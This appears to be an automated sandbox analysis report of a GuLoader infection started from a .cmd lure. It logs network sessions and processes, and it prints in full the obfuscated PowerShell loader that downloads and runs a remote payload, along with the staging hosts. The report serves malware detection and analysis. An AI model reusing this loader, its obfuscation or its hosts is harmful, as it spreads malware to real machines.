65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                              0  192.168.2.4  49737  13.85.23.86  443
                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                              2024-05-02 15:21:18 UTC  306  OUT  GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-05-02 15:21:18 UTC  560  IN  HTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                              MS-CorrelationId: 319179a4-5a2d-4abe-a0ea-26fbc04063c9
                                                                              MS-RequestId: 9d3c1b22-f518-4d48-9df1-05a39983dc31
                                                                              MS-CV: OAvv/0tL9kilbFWb.0
                                                                              X-Microsoft-SLSClientCache: 2880
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Thu, 02 May 2024 15:21:17 GMT
                                                                              Connection: close
                                                                              Content-Length: 24490
                                                                              2024-05-02 15:21:18 UTC  15824  IN  Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                              2024-05-02 15:21:18 UTC  8666  IN  Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                              1  192.168.2.4  49747  46.254.34.12  443  8872  C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                              2024-05-02 15:21:53 UTC  179  OUT  GET /wnnSAFMWPwDXGy95.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: duelvalenza.it
                                                                              Cache-Control: no-cache
                                                                              2024-05-02 15:21:53 UTC | 299 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 02 May 2024 15:21:53 GMT
                                                                              Server: Apache
                                                                              Location: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin
                                                                              Cache-Control: max-age=1800
                                                                              Expires: Thu, 02 May 2024 15:51:53 GMT
                                                                              Content-Length: 254
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              2024-05-02 15:21:53 UTC | 254 | IN | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin">here</a>.</p></body></html>


                                                                              Session ID:2
                                                                              Source IP:192.168.2.4
                                                                              Source Port:49750
                                                                              Destination IP:13.85.23.86
                                                                              Destination Port:443
                                                                              PID:
                                                                              Process:
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-05-02 15:21:58 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-05-02 15:21:59 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                              MS-CorrelationId: 9e9e4730-201d-4ff0-b5c6-e11f21e13623
                                                                              MS-RequestId: f3f7051d-adca-4c83-a73d-81f72731c959
                                                                              MS-CV: HrpLe7m+ZkilhptC.0
                                                                              X-Microsoft-SLSClientCache: 2160
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Thu, 02 May 2024 15:21:58 GMT
                                                                              Connection: close
                                                                              Content-Length: 25457



                                                                              Target ID:0
                                                                              Start time:17:20:53
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd" "
                                                                              Imagebase:0x7ff61a8e0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:17:20:54
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:17:20:54
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu 
Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . 
JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' 
Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;"
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:17:20:54
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:17:20:56
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
                                                                              Imagebase:0x7ff61a8e0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:17:21:03
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau 
oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.rOpb,s Kon[Scra$ManaNlaunyFlods AersAfske ranlRekli Limg .ine ForsShee]Hs.p=Cycl$RegnPM.shaStvllEftemIndfe ca,hLegea picvHulkePerir.lens ,im ');$coriariaceous=Handig 'sce Uemb,rBajaeHvaltGrameGeotrZoetoUrangTaburPyroaButtpin,ahLaa . 
JydDMinno ,dew Mian Karl chioBl eaWhirdSk,lFBlowiH ccla,tieCy,n(Nool$ ubiFNo,ioProcrFrysdShibo y gmr comHisteOphisRetu,Fug $ene,SBaksaMicrnAfladAnnofUncaaPseunuppegKlo,)Anr, ';$coriariaceous=$Sweepy[1]+$coriariaceous;$Sandfang=$Sweepy[0];Xerotherm (Handig 'El.a$EclagTvivlUnbioyeltbSaniaEdd.lTeu,:Hyd.DMa.doTan,y Labe.eatn obenStoue RetsRosi=Os,e(Afs.TRokeeSaf sP,dit Im,- UngPMyoka ContSciuhgrup Cong$Upr SChama ThenStubdBrodfSu,eaDonknAfkrgPost) clu ');while (!$Doyennes) {Xerotherm (Handig 'Deg $VedlgKlasl Sldo.ancbRmera ehalHeat:.ranKfleuiAntil UndoOpkamPreieSammtPrverAfbiiDegecIn.eaEntelLign4Over1Boul=S kk$ IrgtJe,nrTseauRessePatb ') ;Xerotherm $coriariaceous;Xerotherm (Handig 'D,nuSUntetB,igaAeror ,autPy,r-LetvSIod lS,roeRegae S epUr d Alv4 c.l ');Xerotherm (Handig ' Ac,$StorgT,rmlB.odo B,ybScroa Su,l st,:BrebD E,poYampy Fore Ampn BalnAfbiehe.asCres=bre.(T llTComse Sprs Subt Fle-Be,lPFilaaCoditInddhRe,r fred$ ,nnSgarpastrinNon.d ,apf FagaCentnForrgUdla)ligh ') ;Xerotherm (Handig ' Hem$Hrfrg SholSvumo ForbFl.na Foolspru:K,kkRci eeCac,s,ctauopv r Bypr UnceStifc.lietHurliCiceo bo.no,ereL.nerQuin=Lync$ReingCuvel rreoExorb Lnna,isrlSupe: MusM.mitaHardrE,rekBonnuSan,s NonsPs c+Maga+Fje.% wis$SpalD ouaeMetabenkeaElektBr.stTagdeSamaa mentDourrMulteMetanNo ueSal sAero.GenacStevoViewuPlejnstortProa ') ;$Fordommes=$Debatteatrenes[$Resurrectioner];}Xerotherm (Handig 'Kask$PepogFernl ,apoD,ndb oma Seml oun:StepF MobeOverd retInflhPissaDeprsEn.re,aphnServeObjessemi jve=Skid FrstGBevieMongtB.aa-FortCBlodokulanProzt .iceVandn GaltProg Prog$P.ndSFedtaLtrvnE,esdK,odfIntea Fran StogNone ');Xerotherm (Handig 'Anie$Beneg fril ExpoT olbMonoaB.dalPanu: DipSSannt.ntirlif,gFarth A ga Im nBl,edAmtslCompe P.onCa,asCond Diff= Tri S.at[T aiS ucy GodsSta,tKreseCe am .ap.TanaCT.oko.rydnS rbvI,dgeForbrRufutetat]Nost: A i:SystF Silr IndoForvmStarBE traPyros BygeE.gr6 Ind4L tiS BeatAl ar MisiTe lnTakngKnor(nedb$TheiFBarseHanddRegitReprhSgekaA,essE,eneDishnUnhaeInstsUnde)Madr ');Xerotherm (Handig ' 
Str$ AangNdr,l,scooundebMu ta Empl cas: .taKRa da C,lsRivni shenAg moK.ndeHighrRi,en,ouleMacrs,alv Mag.= ag, Thyr[SalgS .koyGlucsM,latStudeVoltmP.sq.E.trT Sc e s.oxTesttJust. ,trEPersnTranc Sano Cadd.mtsiScotnpjatgEccr] Zin: Air: PriALiniS RetCBegrI .epI et.pecuGo iee SkrtRecaSLanatBaggrisoriSleen C,igo to(Ind,$CervS Undt.ookr omrg Ar,hVolvaPortnSemidInvalFlkke RmnnRublsBedr),ati ');Xerotherm (Handig ' Soc$Savig Sa,l,rugomimibNyheapinklFrti:Et iTKillo rvemKry.mUnsaiStrieLu i= Pro$FlueKO,tiaRatisSp,liKontnStivoN bbehemorBestnAntieVests Ud .Djv.s Konu JaybWai,s LaetNej,r K li gednGaulg,vic( Aa,2Flel9Sold8Galv0over4N,le3Boll,Gemm2Mira7H us8Loun6Febe3Htte)Judg ');Xerotherm $Tommie;"
                                                                              Imagebase:0xf00000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2310422489.0000000008E60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2310523296.0000000009685000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2304485459.0000000006292000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:17:21:05
                                                                              Start date:02/05/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:7
                                                                              Start time:17:21:06
                                                                              Start date:02/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
